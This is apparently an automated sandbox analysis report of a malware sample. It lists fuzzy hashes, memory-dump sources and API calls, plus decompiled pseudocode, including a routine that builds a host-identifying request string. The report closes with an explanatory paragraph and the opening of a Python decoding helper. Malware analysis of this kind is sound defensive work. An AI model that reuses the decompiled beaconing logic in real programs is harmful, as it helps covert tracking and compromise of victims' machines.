                                                            • Opcode ID: 93a0f9e6965e21eb474461c0c7a7e6704fd1945dbb02372d486fccd2de939bd2
                                                            • Instruction ID: 32252941fe9efd861769d2205387a53953c8a15cd31211f6636f9590f00cd99f
                                                            • Opcode Fuzzy Hash: 93a0f9e6965e21eb474461c0c7a7e6704fd1945dbb02372d486fccd2de939bd2
                                                            • Instruction Fuzzy Hash: D8427970A00B558FCB29CF69C4906AAB7F2FF49304F14896DD49B9B755E734B886DB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 23115a832860182a98218d2ce3fe1824957f59def6109b8f86834c60c99c3403
                                                            • Instruction ID: a067d3a743b8fcd2edbbcc38bce845b55da196845c9f7c145227d24d641186f6
                                                            • Opcode Fuzzy Hash: 23115a832860182a98218d2ce3fe1824957f59def6109b8f86834c60c99c3403
                                                            • Instruction Fuzzy Hash: E3021A71E00219DFCF18CF58D5906ACBBF2FF89315F1485AAD852AB285E734AA41EF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 12a708cca95c067f8c5f248a7bd5d537db9c68be24864f17fb345cea860a6527
                                                            • Instruction ID: 0b43a14dbd4451c57b70d6ed8d5d7fc6faf99c5a431912984b96146b0d8769c3
                                                            • Opcode Fuzzy Hash: 12a708cca95c067f8c5f248a7bd5d537db9c68be24864f17fb345cea860a6527
                                                            • Instruction Fuzzy Hash: CEF15330A08619ABCF0CCF9AD0A04BDBBB2FF89314F14C59EE4966B645CB346A45DF14
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID:
                                                            • API String ID: 3510742995-0
                                                            • Opcode ID: 9f959aab1e7054f5ac0b1d4ee1ccee450809856f57c44b4f143954c4ba246fd5
                                                            • Instruction ID: b2870eae2b3621fe0632d74ad209dc5525a062ff8dfdb9d8389620fffd66fc7b
                                                            • Opcode Fuzzy Hash: 9f959aab1e7054f5ac0b1d4ee1ccee450809856f57c44b4f143954c4ba246fd5
                                                            • Instruction Fuzzy Hash: 1EC1FF36610B418FD735EF29C880AA6B3E1BF89304B54496EE9D787B61DB75F881DB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                                                            • Instruction ID: d8d960ed55370ec1626aed6be5e892d3512db27ecc6c6b02a337ead7db64d2b0
                                                            • Opcode Fuzzy Hash: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                                                            • Instruction Fuzzy Hash: A821C432900208ABDB10FF68C8C096BBBA5FF84350B4981ACD959AB245EF30F915D7E0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 71%
                                                            			E6E4B2274(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                            				intOrPtr _v8;
                                                            				char _v12;
                                                            				void* __ebp;
                                                            				signed int* _t43;
                                                            				char _t44;
                                                            				void* _t46;
                                                            				void* _t49;
                                                            				intOrPtr* _t53;
                                                            				void* _t54;
                                                            				void* _t65;
                                                            				long _t66;
                                                            				signed int* _t80;
                                                            				signed int* _t82;
                                                            				void* _t84;
                                                            				signed int _t86;
                                                            				void* _t89;
                                                            				void* _t95;
                                                            				void* _t96;
                                                            				void* _t99;
                                                            				void* _t106;
                                                            
                                                            				_t43 = _t84;
                                                            				_t65 = __ebx + 2;
                                                            				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                            				_t89 = _t95;
                                                            				_t96 = _t95 - 8;
                                                            				_push(_t65);
                                                            				_push(_t84);
                                                            				_push(_t89);
                                                            				asm("cld");
                                                            				_t66 = _a8;
                                                            				_t44 = _a4;
                                                            				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                            					_push(_t89);
                                                            					E6E4B23DB(_t66 + 0x10, _t66, 0xffffffff);
                                                            					_t46 = 1;
                                                            				} else {
                                                            					_v12 = _t44;
                                                            					_v8 = _a12;
                                                            					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                            					_t86 =  *(_t66 + 0xc);
                                                            					_t80 =  *(_t66 + 8);
                                                            					_t49 = E6E4B2495(_t66);
                                                            					_t99 = _t96 + 4;
                                                            					if(_t49 == 0) {
                                                            						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                            						goto L11;
                                                            					} else {
                                                            						while(_t86 != 0xffffffff) {
                                                            							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                            							if(_t53 == 0) {
                                                            								L8:
                                                            								_t80 =  *(_t66 + 8);
                                                            								_t86 = _t80[_t86 + _t86 * 2];
                                                            								continue;
                                                            							} else {
                                                            								_t54 =  *_t53();
                                                            								_t89 = _t89;
                                                            								_t86 = _t86;
                                                            								_t66 = _a8;
                                                            								_t55 = _t54;
                                                            								_t106 = _t54;
                                                            								if(_t106 == 0) {
                                                            									goto L8;
                                                            								} else {
                                                            									if(_t106 < 0) {
                                                            										_t46 = 0;
                                                            									} else {
                                                            										_t82 =  *(_t66 + 8);
                                                            										E6E4B2380(_t55, _t66);
                                                            										_t89 = _t66 + 0x10;
                                                            										E6E4B23DB(_t89, _t66, 0);
                                                            										_t99 = _t99 + 0xc;
                                                            										E6E4B2477(_t82[2], 1);
                                                            										 *(_t66 + 0xc) =  *_t82;
                                                            										_t66 = 0;
                                                            										_t86 = 0;
                                                            										 *(_t82[2])();
                                                            										goto L8;
                                                            									}
                                                            								}
                                                            							}
                                                            							goto L13;
                                                            						}
                                                            						L11:
                                                            						_t46 = 1;
                                                            					}
                                                            				}
                                                            				L13:
                                                            				return _t46;
                                                            			}

                                                            Instruction addresses: 0x6e4b2278, 0x6e4b2279, 0x6e4b227a, 0x6e4b227d, 0x6e4b227f, 0x6e4b2282, 0x6e4b2283, 0x6e4b2285, 0x6e4b2286, 0x6e4b2287, 0x6e4b228a, 0x6e4b2294, 0x6e4b2345, 0x6e4b234c, 0x6e4b2355, 0x6e4b229a, 0x6e4b229a, 0x6e4b22a0, 0x6e4b22a6, 0x6e4b22a9, 0x6e4b22ac, 0x6e4b22b0, 0x6e4b22b5, 0x6e4b22ba, 0x6e4b233a, 0x00000000, 0x6e4b22bc, 0x6e4b22bc, 0x6e4b22c8, 0x6e4b22ca, 0x6e4b2325, 0x6e4b2325, 0x6e4b232b, 0x00000000, 0x6e4b22cc, 0x6e4b22db, 0x6e4b22dd, 0x6e4b22de, 0x6e4b22df, 0x6e4b22e2, 0x6e4b22e2, 0x6e4b22e4, 0x00000000, 0x6e4b22e6, 0x6e4b22e6, 0x6e4b2330, 0x6e4b22e8, 0x6e4b22e8, 0x6e4b22ec, 0x6e4b22f4, 0x6e4b22f9, 0x6e4b22fe, 0x6e4b230a, 0x6e4b2312, 0x6e4b2319, 0x6e4b231f, 0x6e4b2323, 0x00000000, 0x6e4b2323, 0x6e4b22e6, 0x6e4b22e4, 0x00000000, 0x6e4b22ca, 0x6e4b233e, 0x6e4b233e, 0x6e4b233e, 0x6e4b22ba, 0x6e4b235a, 0x6e4b2361

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                            • Instruction ID: 29926ae4e1aa80989250d438ea1019b0221f094dfe47d2356a161b23c83d5557
                                                            • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                            • Instruction Fuzzy Hash: C221C4329002059FCB00DFB8C880DABB7A9FF48350B458569D8558B245DB30FA15C7F0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 71%
                                                            			E00DD7E30(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                            				intOrPtr _v8;
                                                            				char _v12;
                                                            				void* __ebp;
                                                            				signed int* _t43;
                                                            				char _t44;
                                                            				void* _t46;
                                                            				void* _t49;
                                                            				intOrPtr* _t53;
                                                            				void* _t54;
                                                            				void* _t65;
                                                            				long _t66;
                                                            				signed int* _t80;
                                                            				signed int* _t82;
                                                            				void* _t84;
                                                            				signed int _t86;
                                                            				void* _t89;
                                                            				void* _t95;
                                                            				void* _t96;
                                                            				void* _t99;
                                                            				void* _t106;
                                                            
                                                            				_t43 = _t84;
                                                            				_t65 = __ebx + 2;
                                                            				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                            				_t89 = _t95;
                                                            				_t96 = _t95 - 8;
                                                            				_push(_t65);
                                                            				_push(_t84);
                                                            				_push(_t89);
                                                            				asm("cld");
                                                            				_t66 = _a8;
                                                            				_t44 = _a4;
                                                            				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                            					_push(_t89);
                                                            					E00DD7F9B(_t66 + 0x10, _t66, 0xffffffff);
                                                            					_t46 = 1;
                                                            				} else {
                                                            					_v12 = _t44;
                                                            					_v8 = _a12;
                                                            					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                            					_t86 =  *(_t66 + 0xc);
                                                            					_t80 =  *(_t66 + 8);
                                                            					_t49 = E00DD8055(_t66);
                                                            					_t99 = _t96 + 4;
                                                            					if(_t49 == 0) {
                                                            						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                            						goto L11;
                                                            					} else {
                                                            						while(_t86 != 0xffffffff) {
                                                            							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                            							if(_t53 == 0) {
                                                            								L8:
                                                            								_t80 =  *(_t66 + 8);
                                                            								_t86 = _t80[_t86 + _t86 * 2];
                                                            								continue;
                                                            							} else {
                                                            								_t54 =  *_t53();
                                                            								_t89 = _t89;
                                                            								_t86 = _t86;
                                                            								_t66 = _a8;
                                                            								_t55 = _t54;
                                                            								_t106 = _t54;
                                                            								if(_t106 == 0) {
                                                            									goto L8;
                                                            								} else {
                                                            									if(_t106 < 0) {
                                                            										_t46 = 0;
                                                            									} else {
                                                            										_t82 =  *(_t66 + 8);
                                                            										E00DD7F40(_t55, _t66);
                                                            										_t89 = _t66 + 0x10;
                                                            										E00DD7F9B(_t89, _t66, 0);
                                                            										_t99 = _t99 + 0xc;
                                                            										E00DD8037(_t82[2]);
                                                            										 *(_t66 + 0xc) =  *_t82;
                                                            										_t66 = 0;
                                                            										_t86 = 0;
                                                            										 *(_t82[2])(1);
                                                            										goto L8;
                                                            									}
                                                            								}
                                                            							}
                                                            							goto L13;
                                                            						}
                                                            						L11:
                                                            						_t46 = 1;
                                                            					}
                                                            				}
                                                            				L13:
                                                            				return _t46;
                                                            			}

                                                            Instruction addresses: 0x00dd7e34, 0x00dd7e35, 0x00dd7e36, 0x00dd7e39, 0x00dd7e3b, 0x00dd7e3e, 0x00dd7e3f, 0x00dd7e41, 0x00dd7e42, 0x00dd7e43, 0x00dd7e46, 0x00dd7e50, 0x00dd7f01, 0x00dd7f08, 0x00dd7f11, 0x00dd7e56, 0x00dd7e56, 0x00dd7e5c, 0x00dd7e62, 0x00dd7e65, 0x00dd7e68, 0x00dd7e6c, 0x00dd7e71, 0x00dd7e76, 0x00dd7ef6, 0x00000000, 0x00dd7e78, 0x00dd7e78, 0x00dd7e84, 0x00dd7e86, 0x00dd7ee1, 0x00dd7ee1, 0x00dd7ee7, 0x00000000, 0x00dd7e88, 0x00dd7e97, 0x00dd7e99, 0x00dd7e9a, 0x00dd7e9b, 0x00dd7e9e, 0x00dd7e9e, 0x00dd7ea0, 0x00000000, 0x00dd7ea2, 0x00dd7ea2, 0x00dd7eec, 0x00dd7ea4, 0x00dd7ea4, 0x00dd7ea8, 0x00dd7eb0, 0x00dd7eb5, 0x00dd7eba, 0x00dd7ec6, 0x00dd7ece, 0x00dd7ed5, 0x00dd7edb, 0x00dd7edf, 0x00000000, 0x00dd7edf, 0x00dd7ea2, 0x00dd7ea0, 0x00000000, 0x00dd7e86, 0x00dd7efa, 0x00dd7efa, 0x00dd7efa, 0x00dd7e76, 0x00dd7f16, 0x00dd7f1d

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                            • Instruction ID: 4c63fe6a90e76ec5350cf8a56be0b3fce361618dda0f363419ac4ff314bd2438
                                                            • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                            • Instruction Fuzzy Hash: A121A4729042059BCB10EF68C8809ABB7A5FF44350B4985EAED558B345E730FD15C7F0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL ref: 045761AF
                                                            • GetTickCount.KERNEL32 ref: 045761C9
                                                            • wsprintfA.USER32 ref: 0457621C
                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 04576228
                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 04576233
                                                            • _aulldiv.NTDLL(?,?,?,?), ref: 04576249
                                                            • wsprintfA.USER32 ref: 0457625F
                                                            • wsprintfA.USER32 ref: 0457627D
                                                            • wsprintfA.USER32 ref: 04576294
                                                            • wsprintfA.USER32 ref: 045762B5
                                                            • wsprintfA.USER32 ref: 045762F0
                                                            • wsprintfA.USER32 ref: 04576314
                                                            • lstrcat.KERNEL32(?,?), ref: 0457634C
                                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04576366
                                                            • GetTickCount.KERNEL32 ref: 04576376
                                                            • RtlEnterCriticalSection.NTDLL(049BB148), ref: 0457638A
                                                            • RtlLeaveCriticalSection.NTDLL(049BB148), ref: 045763A8
                                                            • StrTrimA.SHLWAPI(00000000,045863D8,00000000,049BB188), ref: 045763DD
                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 045763FD
                                                            • lstrcat.KERNEL32(00000000,?), ref: 04576408
                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 0457640C
                                                            • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,?,00000000), ref: 0457648D
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0457649C
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,049BB188), ref: 045764AB
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 045764BD
                                                            • HeapFree.KERNEL32(00000000,?), ref: 045764CF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heapwsprintf$Free$lstrcat$AllocateCountCriticalPerformanceQuerySectionTick$CounterEnterFrequencyLeaveTrim_aulldivlstrcpy
                                                            • String ID: F{U{
                                                            • API String ID: 2878544442-3347341033
                                                            • Opcode ID: 5678339672d7757c82c92f04029936a1f8df84e62a4d610653819d65d915f85c
                                                            • Instruction ID: f910347e8637a12425b9942e75053fd14e09d2dc1d093fe010f23a7ec90988d4
                                                            • Opcode Fuzzy Hash: 5678339672d7757c82c92f04029936a1f8df84e62a4d610653819d65d915f85c
                                                            • Instruction Fuzzy Hash: 86A14871500206EFDB02DFA9EC84E5A3BE9FB48314F045429F549E7251DE39E818EF61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL ref: 045805ED
                                                            • wsprintfA.USER32 ref: 04580652
                                                            • wsprintfA.USER32 ref: 04580698
                                                            • wsprintfA.USER32 ref: 045806B9
                                                            • lstrcat.KERNEL32(00000000,?), ref: 045806F0
                                                            • wsprintfA.USER32 ref: 0458070C
                                                            • wsprintfA.USER32 ref: 04580722
                                                            • wsprintfA.USER32 ref: 04580742
                                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0458075F
                                                            • RtlEnterCriticalSection.NTDLL(049BB148), ref: 04580780
                                                            • RtlLeaveCriticalSection.NTDLL(049BB148), ref: 0458079A
                                                              • Part of subcall function 04577DB7: lstrlen.KERNEL32(00000000,73BB81D0,?,00000000,00000000,?,?,045763BE,00000000,049BB188), ref: 04577DE2
                                                              • Part of subcall function 04577DB7: lstrlen.KERNEL32(?,?,?,045763BE,00000000,049BB188), ref: 04577DEA
                                                              • Part of subcall function 04577DB7: strcpy.NTDLL ref: 04577E01
                                                              • Part of subcall function 04577DB7: lstrcat.KERNEL32(00000000,?), ref: 04577E0C
                                                              • Part of subcall function 04577DB7: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,045763BE,00000000,049BB188), ref: 04577E29
                                                            • StrTrimA.SHLWAPI(00000000,045863D8,00000000,049BB188), ref: 045807CC
                                                              • Part of subcall function 045695DD: lstrlen.KERNEL32(049B9986,00000000,73BB81D0,00000000,045763E9,00000000), ref: 045695ED
                                                              • Part of subcall function 045695DD: lstrlen.KERNEL32(?), ref: 045695F5
                                                              • Part of subcall function 045695DD: lstrcpy.KERNEL32(00000000,049B9986), ref: 04569609
                                                              • Part of subcall function 045695DD: lstrcat.KERNEL32(00000000,?), ref: 04569614
                                                            • lstrcpy.KERNEL32(?,00000000), ref: 045807F0
                                                            • lstrcat.KERNEL32(?,?), ref: 045807FE
                                                            • lstrcat.KERNEL32(?,00000000), ref: 04580805
                                                            • RtlEnterCriticalSection.NTDLL(049BB148), ref: 04580810
                                                            • RtlLeaveCriticalSection.NTDLL(049BB148), ref: 0458082C
                                                              • Part of subcall function 0457BE8F: memcpy.NTDLL(?,04575AB0,00000010,?,?,?,?,?,?,?,?,?,?,04583452,00000000,00000001), ref: 0457BEE0
                                                              • Part of subcall function 0457BE8F: memcpy.NTDLL(00000000,00000001,04575AB0,0000011F), ref: 0457BF73
                                                            • HeapFree.KERNEL32(00000000,?,00000001,049BB188,?,?,?), ref: 045808FA
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04580909
                                                            • HeapFree.KERNEL32(00000000,?,00000000,049BB188), ref: 0458091B
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0458092D
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0458093C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$wsprintf$Freelstrcat$CriticalSectionlstrlen$AllocateEnterLeaveTrimlstrcpymemcpy$strcpy
                                                            • String ID: F{U{
                                                            • API String ID: 2173832509-3347341033
                                                            • Opcode ID: 15ca5481d6012a325eceb4f7f0e095f6442dfb3ff0b6923329b37a4719b4ca6d
                                                            • Instruction ID: 2783d373e1c55111bbee0e79b501fcb2d16b22eb5d5101b9ba7ff8cc2af8989d
                                                            • Opcode Fuzzy Hash: 15ca5481d6012a325eceb4f7f0e095f6442dfb3ff0b6923329b37a4719b4ca6d
                                                            • Instruction Fuzzy Hash: 78A16531504205EFD702EFA9EC84E1A7BE8FB88704F05542DF549E72A1DE39E808EB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E00DD323C(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
                                                            				void* _v8;
                                                            				void* _v12;
                                                            				void* _v16;
                                                            				void* _v20;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				long _t63;
                                                            				intOrPtr _t64;
                                                            				intOrPtr _t65;
                                                            				intOrPtr _t66;
                                                            				intOrPtr _t67;
                                                            				intOrPtr _t68;
                                                            				void* _t71;
                                                            				intOrPtr _t72;
                                                            				int _t75;
                                                            				void* _t76;
                                                            				intOrPtr _t77;
                                                            				intOrPtr _t81;
                                                            				intOrPtr _t85;
                                                            				intOrPtr _t86;
                                                            				void* _t88;
                                                            				void* _t91;
                                                            				intOrPtr _t95;
                                                            				intOrPtr _t99;
                                                            				intOrPtr* _t101;
                                                            				void* _t107;
                                                            				intOrPtr _t111;
                                                            				signed int _t115;
                                                            				char** _t117;
                                                            				int _t120;
                                                            				intOrPtr* _t123;
                                                            				intOrPtr* _t125;
                                                            				intOrPtr* _t127;
                                                            				intOrPtr* _t129;
                                                            				intOrPtr _t132;
                                                            				intOrPtr _t135;
                                                            				int _t138;
                                                            				intOrPtr _t139;
                                                            				int _t142;
                                                            				void* _t143;
                                                            				void* _t144;
                                                            				void* _t154;
                                                            				int _t157;
                                                            				void* _t158;
                                                            				void* _t159;
                                                            				void* _t160;
                                                            				intOrPtr _t161;
                                                            				void* _t163;
                                                            				long _t167;
                                                            				intOrPtr* _t168;
                                                            				intOrPtr* _t171;
                                                            				void* _t172;
                                                            				void* _t174;
                                                            				void* _t175;
                                                            				void* _t180;
                                                            
                                                            				_t154 = __edx;
                                                            				_t144 = __ecx;
                                                            				_t63 = __eax;
                                                            				_t143 = _a20;
                                                            				_a20 = 8;
                                                            				if(__eax == 0) {
                                                            					_t63 = GetTickCount();
                                                            				}
                                                            				_t64 =  *0xdda018; // 0x7b557b46
                                                            				asm("bswap eax");
                                                            				_t65 =  *0xdda014; // 0x5cb11ae7
                                                            				asm("bswap eax");
                                                            				_t66 =  *0xdda010; // 0x15dc9586
                                                            				asm("bswap eax");
                                                            				_t67 =  *0xdda00c; // 0x67522d90
                                                            				asm("bswap eax");
                                                            				_t68 =  *0xdda2d4; // 0x2bed5a8
                                                            				_t3 = _t68 + 0xddb622; // 0x74666f73
                                                            				_t157 = wsprintfA(_t143, _t3, 3, 0x3d163, _t67, _t66, _t65, _t64,  *0xdda02c,  *0xdda004, _t63);
                                                            				_t71 = E00DD4155();
                                                            				_t72 =  *0xdda2d4; // 0x2bed5a8
                                                            				_t4 = _t72 + 0xddb662; // 0x74707526
                                                            				_t75 = wsprintfA(_t157 + _t143, _t4, _t71);
                                                            				_t174 = _t172 + 0x38;
                                                            				_t158 = _t157 + _t75;
                                                            				if(_a8 != 0) {
                                                            					_t139 =  *0xdda2d4; // 0x2bed5a8
                                                            					_t8 = _t139 + 0xddb66d; // 0x732526
                                                            					_t142 = wsprintfA(_t158 + _t143, _t8, _a8);
                                                            					_t174 = _t174 + 0xc;
                                                            					_t158 = _t158 + _t142;
                                                            				}
                                                            				_t76 = E00DD35BC(_t144);
                                                            				_t77 =  *0xdda2d4; // 0x2bed5a8
                                                            				_t10 = _t77 + 0xddb38a; // 0x6d697426
                                                            				_t159 = _t158 + wsprintfA(_t158 + _t143, _t10, _t76, _t154);
                                                            				_t81 =  *0xdda2d4; // 0x2bed5a8
                                                            				_t12 = _t81 + 0xddb7b4; // 0x39c8d5c
                                                            				_t180 = _a4 - _t12;
                                                            				_t14 = _t81 + 0xddb33b; // 0x74636126
                                                            				_t156 = 0 | _t180 == 0x00000000;
                                                            				_t160 = _t159 + wsprintfA(_t159 + _t143, _t14, _t180 == 0);
                                                            				_t85 =  *0xdda31c; // 0x39c95e0
                                                            				_t175 = _t174 + 0x1c;
                                                            				if(_t85 != 0) {
                                                            					_t135 =  *0xdda2d4; // 0x2bed5a8
                                                            					_t18 = _t135 + 0xddb8e9; // 0x3d736f26
                                                            					_t138 = wsprintfA(_t160 + _t143, _t18, _t85);
                                                            					_t175 = _t175 + 0xc;
                                                            					_t160 = _t160 + _t138;
                                                            				}
                                                            				_t86 =  *0xdda32c; // 0x39c95b0
                                                            				if(_t86 != 0) {
                                                            					_t132 =  *0xdda2d4; // 0x2bed5a8
                                                            					_t20 = _t132 + 0xddb685; // 0x73797326
                                                            					wsprintfA(_t160 + _t143, _t20, _t86);
                                                            					_t175 = _t175 + 0xc;
                                                            				}
                                                            				_t161 =  *0xdda37c; // 0x39c9630
                                                            				_t88 = E00DD49BA(0xdda00a, _t161 + 4);
                                                            				_t167 = 0;
                                                            				_v12 = _t88;
                                                            				if(_t88 == 0) {
                                                            					L28:
                                                            					HeapFree( *0xdda290, _t167, _t143);
                                                            					return _a20;
                                                            				} else {
                                                            					_t91 = RtlAllocateHeap( *0xdda290, 0, 0x800);
                                                            					_a8 = _t91;
                                                            					if(_t91 == 0) {
                                                            						L27:
                                                            						HeapFree( *0xdda290, _t167, _v12);
                                                            						goto L28;
                                                            					}
                                                            					E00DD3D0C(GetTickCount());
                                                            					_t95 =  *0xdda37c; // 0x39c9630
                                                            					__imp__(_t95 + 0x40);
                                                            					asm("lock xadd [eax], ecx");
                                                            					_t99 =  *0xdda37c; // 0x39c9630
                                                            					__imp__(_t99 + 0x40);
                                                            					_t101 =  *0xdda37c; // 0x39c9630
                                                            					_t163 = E00DD637D(1, _t156, _t143,  *_t101);
                                                            					_v20 = _t163;
                                                            					asm("lock xadd [eax], ecx");
                                                            					if(_t163 == 0) {
                                                            						L26:
                                                            						HeapFree( *0xdda290, _t167, _a8);
                                                            						goto L27;
                                                            					}
                                                            					StrTrimA(_t163, 0xdd92ac);
                                                            					_push(_t163);
                                                            					_t107 = E00DD7067();
                                                            					_v8 = _t107;
                                                            					if(_t107 == 0) {
                                                            						L25:
                                                            						HeapFree( *0xdda290, _t167, _t163);
                                                            						goto L26;
                                                            					}
                                                            					 *_t163 = 0;
                                                            					__imp__(_a8, _v12);
                                                            					_t168 = __imp__;
                                                            					 *_t168(_a8, _v8);
                                                            					_t111 = E00DD5691( *_t168(_a8, _t163), _a8);
                                                            					_a4 = _t111;
                                                            					if(_t111 == 0) {
                                                            						_a20 = 8;
                                                            						L23:
                                                            						E00DD454A();
                                                            						L24:
                                                            						HeapFree( *0xdda290, 0, _v8);
                                                            						_t167 = 0;
                                                            						goto L25;
                                                            					}
                                                            					_t115 = E00DD656F(_t143, 0xffffffffffffffff, _t163,  &_v16);
                                                            					_a20 = _t115;
                                                            					if(_t115 == 0) {
                                                            						_t171 = _v16;
                                                            						_a20 = E00DD211F(_t171, _a4, _a12, _a16);
                                                            						_t123 =  *((intOrPtr*)(_t171 + 8));
                                                            						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
                                                            						_t125 =  *((intOrPtr*)(_t171 + 8));
                                                            						 *((intOrPtr*)( *_t125 + 8))(_t125);
                                                            						_t127 =  *((intOrPtr*)(_t171 + 4));
                                                            						 *((intOrPtr*)( *_t127 + 8))(_t127);
                                                            						_t129 =  *_t171;
                                                            						 *((intOrPtr*)( *_t129 + 8))(_t129);
                                                            						E00DD77EC(_t171);
                                                            					}
                                                            					if(_a20 != 0x10d2) {
                                                            						L18:
                                                            						if(_a20 == 0) {
                                                            							_t117 = _a12;
                                                            							if(_t117 != 0) {
                                                            								_t164 =  *_t117;
                                                            								_t169 =  *_a16;
                                                            								wcstombs( *_t117,  *_t117,  *_a16);
                                                            								_t120 = E00DD75F0(_t164, _t164, _t169 >> 1);
                                                            								_t163 = _v20;
                                                            								 *_a16 = _t120;
                                                            							}
                                                            						}
                                                            						goto L21;
                                                            					} else {
                                                            						if(_a12 != 0) {
                                                            							L21:
                                                            							E00DD77EC(_a4);
                                                            							if(_a20 == 0 || _a20 == 0x10d2) {
                                                            								goto L24;
                                                            							} else {
                                                            								goto L23;
                                                            							}
                                                            						}
                                                            						_a20 = _a20 & 0x00000000;
                                                            						goto L18;
                                                            					}
                                                            				}
                                                            			}
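The listing above is a Joe Sandbox decompilation, so the `// 0x...` comments on the `_tN = _t68 + 0xddb6xx` lines are not pointers but the first four bytes of each format string that wsprintfA is handed (little-endian, so 0x74666f73 spells "soft" and 0x74707526 spells "&upt"), and the four `asm("bswap eax")` steps decide how the 16-byte id at 0xdda00c..0xdda01c is rendered. The following Python helper is an added example written for this page, not code from the sample or from the report. It decodes those immediates from a constructed excerpt of the listing and shows what the bswap does to the id words; the `%08x` specifier is an assumption, since only the first four bytes of each format string are visible on the page.

```python
"""Helpers for reading the decompiled listing above: recover the ASCII that
the 32-bit immediates in the `// 0x...` comments spell in memory, and show
what the bswap/wsprintfA sequence does to the four id words.
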